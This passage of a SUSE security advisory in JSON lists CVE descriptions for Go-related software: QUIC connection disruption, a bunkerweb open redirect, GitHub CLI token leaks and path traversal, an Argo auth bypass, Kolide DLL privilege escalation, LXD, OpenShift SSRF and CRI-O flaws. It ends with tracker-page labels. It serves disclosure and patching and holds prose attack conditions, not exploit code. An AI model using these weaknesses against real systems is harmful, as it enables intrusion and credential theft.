"text": "quic-go is an implementation of the QUIC protocol in Go. An off-path attacker can inject an ICMP Packet Too Large packet. Since affected quic-go versions used IP_PMTUDISC_DO, the kernel would then return a \"message too large\" error on sendmsg, i.e. when quic-go attempts to send a packet that exceeds the MTU claimed in that ICMP packet. By setting this value to smaller than 1200 bytes (the minimum MTU for QUIC), the attacker can disrupt a QUIC connection. Crucially, this can be done after completion of the handshake, thereby circumventing any TCP fallback that might be implemented on the application layer (for example, many browsers fall back to HTTP over TCP if they\u0027re unable to establish a QUIC connection). The attacker needs to at least know the client\u0027s IP and port tuple to mount an attack. This vulnerability is fixed in 0.48.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53259",
"url": "https://www.suse.com/security/cve/CVE-2024-53259"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53259"
},
{
"cve": "CVE-2024-53264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53264"
}
],
"notes": [
{
"category": "general",
"text": "bunkerweb is an Open-source and next-generation Web Application Firewall (WAF). A open redirect vulnerability exists in the loading endpoint, allowing attackers to redirect authenticated users to arbitrary external URLs via the \"next\" parameter. The loading endpoint accepts and uses an unvalidated \"next\" parameter for redirects. Ex. visiting: `/loading?next=https://google.com` while authenticated will cause the page will redirect to google.com. This vulnerability could be used in phishing attacks by redirecting users from a legitimate application URL to malicious sites. This issue has been addressed in version 1.5.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53264",
"url": "https://www.suse.com/security/cve/CVE-2024-53264"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53264"
},
{
"cve": "CVE-2024-53858",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53858"
}
],
"notes": [
{
"category": "general",
"text": "The gh cli is GitHub\u0027s official command line tool. A security vulnerability has been identified in the GitHub CLI that could leak authentication tokens when cloning repositories containing `git` submodules hosted outside of GitHub.com and ghe.com. This vulnerability stems from several `gh` commands used to clone a repository with submodules from a non-GitHub host including `gh repo clone`, `gh repo fork`, and `gh pr checkout`. These GitHub CLI commands invoke git with instructions to retrieve authentication tokens using the `credential.helper` configuration variable for any host encountered. Prior to version `2.63.0`, hosts other than GitHub.com and ghe.com are treated as GitHub Enterprise Server hosts and have tokens sourced from the following environment variables before falling back to host-specific tokens stored within system-specific secured storage: 1. `GITHUB_ENTERPRISE_TOKEN`, 2. `GH_ENTERPRISE_TOKEN` and 3. `GITHUB_TOKEN` when the `CODESPACES` environment variable is set. The result being `git` sending authentication tokens when cloning submodules. In version `2.63.0`, these GitHub CLI commands will limit the hosts for which `gh` acts as a credential helper to source authentication tokens. Additionally, `GITHUB_TOKEN` will only be used for GitHub.com and ghe.com. Users are advised to upgrade. Additionally users are advised to revoke authentication tokens used with the GitHub CLI and to review their personal security log and any relevant audit logs for actions associated with their account or enterprise",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53858",
"url": "https://www.suse.com/security/cve/CVE-2024-53858"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53858"
},
{
"cve": "CVE-2024-53862",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53862"
}
],
"notes": [
{
"category": "general",
"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53862",
"url": "https://www.suse.com/security/cve/CVE-2024-53862"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53862"
},
{
"cve": "CVE-2024-54131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54131"
}
],
"notes": [
{
"category": "general",
"text": "The Kolide Agent (aka: Launcher) is the lightweight agent designed to work with Kolide\u0027s service. An implementation bug in the Kolide Agent (known as `launcher`) allows for local privilege escalation to the SYSTEM user on Windows 10 and 11. The bug was introduced in version 1.5.3 when launcher started storing upgraded binaries in the ProgramData directory. This move to the new directory meant the launcher root directory inherited default permissions that are not as strict as the previous location. These incorrect default permissions in conjunction with an omitted SystemDrive environmental variable (when launcher starts osqueryd), allows a malicious actor with access to the local Windows device to successfully place an arbitrary DLL into the osqueryd process\u0027s search path. Under some circumstances, this DLL will be executed when osqueryd performs a WMI query. This combination of events could then allow the attacker to escalate their privileges to SYSTEM. Impacted versions include versions \u003e= 1.5.3 and the fix has been released in 1.12.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54131",
"url": "https://www.suse.com/security/cve/CVE-2024-54131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-54131"
},
{
"cve": "CVE-2024-54132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54132"
}
],
"notes": [
{
"category": "general",
"text": "The GitHub CLI is GitHub\u0027s official command line tool. A security vulnerability has been identified in GitHub CLI that could create or overwrite files in unintended directories when users download a malicious GitHub Actions workflow artifact through gh run download. This vulnerability stems from a GitHub Actions workflow artifact named .. when downloaded using gh run download. The artifact name and --dir flag are used to determine the artifact\u0027s download path. When the artifact is named .., the resulting files within the artifact are extracted exactly 1 directory higher than the specified --dir flag value. This vulnerability is fixed in 2.63.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54132",
"url": "https://www.suse.com/security/cve/CVE-2024-54132"
},
{
"category": "external",
"summary": "SUSE Bug 1234230 for CVE-2024-54132",
"url": "https://bugzilla.suse.com/1234230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-54132"
},
{
"cve": "CVE-2024-6156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-6156"
}
],
"notes": [
{
"category": "general",
"text": "Mark Laing discovered that LXD\u0027s PKI mode, until version 5.21.2, could be bypassed if the client\u0027s certificate was present in the trust store.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-6156",
"url": "https://www.suse.com/security/cve/CVE-2024-6156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2024-6156"
},
{
"cve": "CVE-2024-6219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-6219"
}
],
"notes": [
{
"category": "general",
"text": "Mark Laing discovered in LXD\u0027s PKI mode, until version 5.21.1, that a restricted certificate could be added to the trust store with its restrictions not honoured.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-6219",
"url": "https://www.suse.com/security/cve/CVE-2024-6219"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2024-6219"
},
{
"cve": "CVE-2024-6538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-6538"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in OpenShift Console. A Server Side Request Forgery (SSRF) attack can happen if an attacker supplies all or part of a URL to the server to query. The server is considered to be in a privileged network position and can often reach exposed services that aren\u0027t readily available to clients due to network filtering. Leveraging such an attack vector, the attacker can have an impact on other services and potentially disclose information or have other nefarious effects on the system.\nThe /api/dev-console/proxy/internet endpoint on the OpenShift Console allows authenticated users to have the console\u0027s pod perform arbitrary and fully controlled HTTP(s) requests. The full response to these requests is returned by the endpoint.\nWhile the name of this endpoint suggests the requests are only bound to the internet, no such checks are in place. An authenticated user can therefore ask the console to perform arbitrary HTTP requests from outside the cluster to a service inside the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-6538",
"url": "https://www.suse.com/security/cve/CVE-2024-6538"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-6538"
},
{
"cve": "CVE-2024-8676",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-8676"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn\u0027t have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-8676",
"url": "https://www.suse.com/security/cve/CVE-2024-8676"
},
{
"category": "external",
"summary": "SUSE Bug 1233812 for CVE-2024-8676",
"url": "https://bugzilla.suse.com/1233812"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-8676"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…